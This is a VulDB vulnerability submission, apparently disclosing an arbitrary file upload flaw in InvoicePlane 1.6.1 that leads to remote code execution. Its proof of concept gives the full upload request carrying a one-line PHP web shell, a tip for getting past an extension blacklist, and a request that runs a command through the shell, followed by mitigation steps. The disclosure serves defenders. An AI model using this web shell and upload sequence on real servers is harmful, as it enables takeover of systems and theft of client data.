जमा करें #459910: InvoicePlane 1.6.1 Arbitrary File Upload & Remote Code Executionजानकारी

शीर्षकInvoicePlane 1.6.1 Arbitrary File Upload & Remote Code Execution
विवरण## **Description** InvoicePlane is an open-source, self-hosted application designed for managing invoices, clients, and payments. With over **1 million Docker downloads** and **6,000+ stars on GitHub**, it is widely adopted by small businesses and freelancers globally. This popularity makes the presence of critical vulnerabilities a significant risk for its user base. A **Remote Code Execution (RCE)** vulnerability has been identified in the `upload_file` method of the `Upload` controller in InvoicePlane. This vulnerability allows an attacker to upload and execute malicious files on the server, potentially gaining full control over the application and its underlying infrastructure. ## **Vulnerability Overview** The vulnerability stems from the absence of proper server-side validation when handling file uploads. The application does not validate the file type or inspect file contents, enabling an attacker to upload arbitrary files, including executable PHP scripts. Once uploaded, these scripts can be accessed via HTTP requests, allowing attackers to execute malicious commands directly on the server. ## **Impact** This vulnerability is not limited to **arbitrary file uploads** but extends to the **execution of uploaded files**, which is significantly more severe. Exploitation of this flaw can lead to the following consequences: - **Remote Code Execution (RCE)**: Attackers can execute arbitrary system commands on the server. - **Full Server Compromise**: Attackers may install backdoors, steal sensitive data, or launch further attacks on internal infrastructure. - **Data Breach**: Compromised customer and invoice data could have severe legal and financial repercussions. - **Service Disruption**: Attackers could delete or corrupt data, rendering the application unusable. ## **Proof of Concept** Below is a step-by-step demonstration of the exploitation of this vulnerability, with a detailed explanation of each request and response. --- ### **Step 1: Upload a Malicious PHP File** **Request:** ``` POST /index.php/upload/upload_file/1/1 HTTP/1.1 Host: invoiceplane.docker.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------36384644001432313523184586075 Cookie: ip_csrf_cookie=078ded7960cc209b04e3da75f2249b75; ip_session=76df458f09d570c7911a6de45fccb072e1bcfada - ----------------------------36384644001432313523184586075 Content-Disposition: form-data; name="_ip_csrf" 078ded7960cc209b04e3da75f2249b75 -----------------------------36384644001432313523184586075 Content-Disposition: form-data; name="file"; filename="rce_test.php" Content-Type: application/x-php <?php echo shell_exec($_GET['cmd']); ?> -----------------------------36384644001432313523184586075-- ``` **Explanation:** The `POST` request uploads a malicious PHP script (`rce_test.php`) to the server. Note that if “php” is backlisted, “php2”, “php3”, and so on are still successfully uploaded. The file contains the payload: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` This payload allows the execution of system commands via the `cmd` GET parameter. **Response:** ``` HTTP/1.1 200 OK Content-Type: application/json { "success": true } ``` **Explanation:** The server responds with a JSON object confirming that the file upload was successful. The `"success": true` message indicates that no validation was performed, and the malicious file was stored on the server. --- ### **Step 2: Execute the Uploaded PHP File** **Request:** ``` GET /uploads/customer_files/1_rce_test.php?cmd=ls HTTP/1.1 Host: invoiceplane.docker.local ``` **Explanation:** The `GET` request accesses the uploaded PHP file (`1_rce_test.php`) and passes the command `ls` as a query parameter via `cmd`. The PHP script executes this command on the server and returns the output. **Response:** ``` HTTP/1.1 200 OK Content-Type: text/html index.html 1_11.php 1_rce_test.php 1_test2.php 1_unique_file.php ... ``` **Explanation:** The server executes the `ls` command and returns the list of files in the directory, including the malicious PHP file (`1_rce_test.php`). This confirms that the uploaded script is executable and capable of running arbitrary commands. --- ## **Mitigation Steps** To remediate this critical issue, the following measures are recommended: 1. **File Type Validation**: Restrict file uploads to specific safe types (e.g., images, PDFs) using server-side MIME type checks. 2. **Content Validation**: Scan the contents of uploaded files using security libraries to detect and block malicious payloads. 3. **Execution Prevention**: Set upload directories to **non-executable** and restrict permissions to prevent the execution of uploaded files. 4. **CSRF Protection**: Properly implement and enforce CSRF protection to ensure file upload requests are authenticated. 5. **Input Sanitization**: Validate and sanitize all user inputs related to file uploads. 6. **Logging and Monitoring**: Log file uploads and monitor for suspicious activity to detect exploitation attempts.
उपयोगकर्ता
 Dan_AC (UID 78862)
सबमिशन10/12/2024 03:38 AM (2 साल पहले)
संयम16/12/2024 10:33 AM (6 days later)
स्थितिस्वीकृत
VulDB प्रविष्टि288538 [InvoicePlane तक 1.6.1 upload_file Arquivo अधिकार वृद्धि]
अंक17

Might our Artificial Intelligence support you?

Check our Alexa App!